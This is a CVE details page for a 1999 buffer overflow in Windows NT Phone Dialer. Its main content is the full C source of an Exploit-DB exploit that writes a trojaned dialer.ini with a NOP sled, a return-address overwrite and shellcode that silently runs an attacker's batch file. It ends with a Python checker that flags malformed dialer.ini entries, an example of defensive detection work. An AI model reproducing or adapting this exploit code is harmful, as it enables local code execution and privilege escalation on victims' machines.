CVE-1999-0700: Details

CVE-1999-0700

Overflow
0.04% V3
Local
2000-01-04 04:00 +00:00
2024-08-01 16:48 +00:00

CVE Description

Buffer overflow in Microsoft Phone Dialer (dialer.exe), via a malformed dialer entry in the dialer.ini file.

CVE Information

Related Weaknesses

CWE-ID: CWE-119
Weakness name: Improper Restriction of Operations within the Bounds of a Memory Buffer
Description: The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Metrics

Metric: CVSS V2
Score: 6.2
Vector: AV:L/AC:H/Au:N/C:C/I:C/A:C
Source: nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the probability that a vulnerability will be exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that the vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile by EPSS score is more likely to be exploited than 95% of all other CVEs. The percentile therefore serves to compare the EPSS score of one CVE against other CVEs.

Exploit Information

Exploit Database EDB-ID: 19440

Publication date: 1999-07-29 22:00 +00:00
Author: David Litchfield
EDB Verified: Yes

// source: https://www.securityfocus.com/bid/554/info

Dialer.exe has an unchecked buffer in the part of the program that reads dialer entries from %systemroot%\dialer.ini. A specially-formed entry could cause arbitrary code to be run on the machine. By default, the %systemroot% folder is world-writeable. Dialer.ini is Dialer runs in the security context of the user, so an attacker would have to have a higher authority user dial the entry to gain any escalated privileges.

The following code will create a trojaned dialer.ini file that, when read in by dialer, will cause it to run a batch file called code.bat - this is hidden from the desktop by calling the equivalent of WinExec("code.bat",0); - and then ExitProcess(0); is called to shut up dialer.exe. Once the dialer.ini has been trojaned the attacker would create a batch file called code.bat and place in there any commands they wished to be run. Needless to say, if a user with admin rights runs dialer, any commands placed in this batch file are likely to succeed.
#include <stdio.h>
#include <windows.h>

int main(void)
{
    FILE *fd;
    char ExploitCode[256];
    int count = 0;

    // Fill the first 100 bytes with NOPs (0x90)
    while (count < 100)
    {
        ExploitCode[count] = 0x90;
        count++;
    }

    // ExploitCode[100] to ExploitCode[103] overwrites the real return address
    // with 0x77F327E5 which contains a "jmp esp" instruction taking us back
    // to our payload of exploit code
    ExploitCode[100] = 0xE5;
    ExploitCode[101] = 0x27;
    ExploitCode[102] = 0xF3;
    ExploitCode[103] = 0x77;

    // procedure prologue - push ebp
    //                      mov ebp,esp
    ExploitCode[104] = 0x55;
    ExploitCode[105] = 0x8B;
    ExploitCode[106] = 0xEC;

    // This moves into the eax register the address where WinExec() is found
    // in kernel32.dll at address 0x77F1A9DA - This address has been hard-
    // coded in to save room rather than going through LoadLibrary() and
    // GetProcAddress() to get the address - since we've already hard
    // coded in the return address from kernel32.dll - there seems no
    // harm in doing this
    ExploitCode[107] = 0xB8;
    ExploitCode[108] = 0xDA;
    ExploitCode[109] = 0xA9;
    ExploitCode[110] = 0xF1;
    ExploitCode[111] = 0x77;

    // We need some NULLs to terminate a string - to do this we xor the esi
    // register with itself - xor esi,esi
    ExploitCode[112] = 0x33;
    ExploitCode[113] = 0xF6;

    // These NULLs are then pushed onto the stack - push esi
    ExploitCode[114] = 0x56;

    // Now the name of the batch file to be run is pushed onto the stack
    // We'll let WinExec() pick up the file - we use push here
    // to push on "tab." (code.bat)
    ExploitCode[115] = 0x68;
    ExploitCode[116] = 0x2E;
    ExploitCode[117] = 0x62;
    ExploitCode[118] = 0x61;
    ExploitCode[119] = 0x74;

    // And now we push on "edoc"
    ExploitCode[120] = 0x68;
    ExploitCode[121] = 0x63;
    ExploitCode[122] = 0x6F;
    ExploitCode[123] = 0x64;
    ExploitCode[124] = 0x65;

    // We push the esi (our NULLs) again - this will be used by WinExec() to determine
    // whether to display a window on the desktop or not - in this case it will not
    ExploitCode[125] = 0x56;

    // The address of the "c" of code.bat is loaded into the edi register - this
    // becomes a pointer to the name of what we want to tell WinExec() to run
    // lea edi,[ebp-0Ch]
    ExploitCode[126] = 0x8D;
    ExploitCode[127] = 0x7D;
    ExploitCode[128] = 0xF4;

    // This is then pushed onto the stack - push edi
    ExploitCode[129] = 0x57;

    // With everything primed we then call WinExec() - this will then run code.bat
    // call eax
    ExploitCode[130] = 0xFF;
    ExploitCode[131] = 0xD0;

    // With the batch file running we then call ExitProcess() to stop dialer.exe
    // from churning out an Access Violation message - first the procedure
    // prologue push ebp and mov ebp,esp
    ExploitCode[132] = 0x55;
    ExploitCode[133] = 0x8B;
    ExploitCode[134] = 0xEC;

    // We need to give ExitProcess() an exit code - we'll give it 0 to use - we need
    // some NULLs then - xor esi,esi
    ExploitCode[135] = 0x33;
    ExploitCode[136] = 0xF6;

    // and we need them on the stack - push esi
    ExploitCode[137] = 0x56;

    // Now we mov the address for ExitProcess() into the EAX register - again we
    // hard code this in, tying this exploit to NT 4.0 SP4
    ExploitCode[138] = 0xB8;
    ExploitCode[139] = 0xE6;
    ExploitCode[140] = 0x9F;
    ExploitCode[141] = 0xF1;
    ExploitCode[142] = 0x77;

    // And then finally call it - call eax
    ExploitCode[143] = 0xFF;
    ExploitCode[144] = 0xD0;

    // Terminate the buffer so it can be written out as a C string
    // (the original left it unterminated, which reads past the payload)
    ExploitCode[145] = 0x00;

    // Now to create the trojaned dialer.ini file
    fd = fopen("dialer.ini", "w+");
    if (fd == NULL)
    {
        printf("Couldn't create dialer.ini");
        return 0;
    }

    // Give dialer.exe what it needs from dialer.ini
    fprintf(fd, "[Preference]\nPreferred Line=148446\nPreferred Address=0\n"
                "Main Window Left/Top=489, 173\n[Last dialed numbers]\nLast dialed 1=");

    // And inject our exploit code - written through "%s" rather than passing
    // the buffer itself as the format string
    fprintf(fd, "%s", ExploitCode);
    fclose(fd);
    return 0;
}
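A defender-side check for the file format described above, added here as an example; it is not part of the Exploit-DB entry or of any Microsoft code. It parses a dialer.ini byte for byte and flags "Last dialed" entries that are overlong or carry non-printable bytes, which a real dialed number never does. The 100-byte threshold is an assumption drawn from the payload layout above (NOP sled up to offset 100), and both sample files are constructed.

```python
# Constructed sample inputs: one benign dialer.ini and one shaped like the
# trojaned file the exploit writes (a 0x90 sled followed by a fake return
# address; no further payload is included).
BENIGN_INI = (b"[Preference]\r\nPreferred Line=148446\r\n"
              b"[Last dialed numbers]\r\nLast dialed 1=555-0100\r\n")
TROJANED_INI = (b"[Preference]\r\nPreferred Line=148446\r\n"
                b"[Last dialed numbers]\r\nLast dialed 1="
                + b"\x90" * 104 + b"\xe5\x27\xf3\x77" + b"\r\n")

MAX_SAFE_VALUE_LEN = 100          # assumption: real numbers are far shorter
TARGET_SECTION = b"[last dialed numbers]"


def suspicious_entries(ini_bytes):
    """Return (key, reason) pairs for entries under [Last dialed numbers]
    whose value is longer than MAX_SAFE_VALUE_LEN or contains bytes
    outside printable ASCII. Parsing is done on raw bytes because a
    malicious file is not valid text."""
    findings = []
    in_target = False
    for raw in ini_bytes.split(b"\n"):
        line = raw.rstrip(b"\r")
        if line.startswith(b"["):
            # Section header: only the dialed-numbers section is inspected
            in_target = line.strip().lower() == TARGET_SECTION
            continue
        if not in_target or b"=" not in line:
            continue
        key, value = line.split(b"=", 1)
        key = key.strip().decode("ascii", "replace")
        if len(value) > MAX_SAFE_VALUE_LEN:
            findings.append((key, "value length %d exceeds %d"
                             % (len(value), MAX_SAFE_VALUE_LEN)))
        if any(b < 0x20 or b > 0x7E for b in value):
            findings.append((key, "non-printable bytes in value"))
    return findings


if __name__ == "__main__":
    for name, data in (("benign", BENIGN_INI), ("trojaned", TROJANED_INI)):
        print(name, suspicious_entries(data))
```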

Products Mentioned

Configuration 0

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_nt >> Version *

Microsoft>>Windows_nt >> Version 4.0

References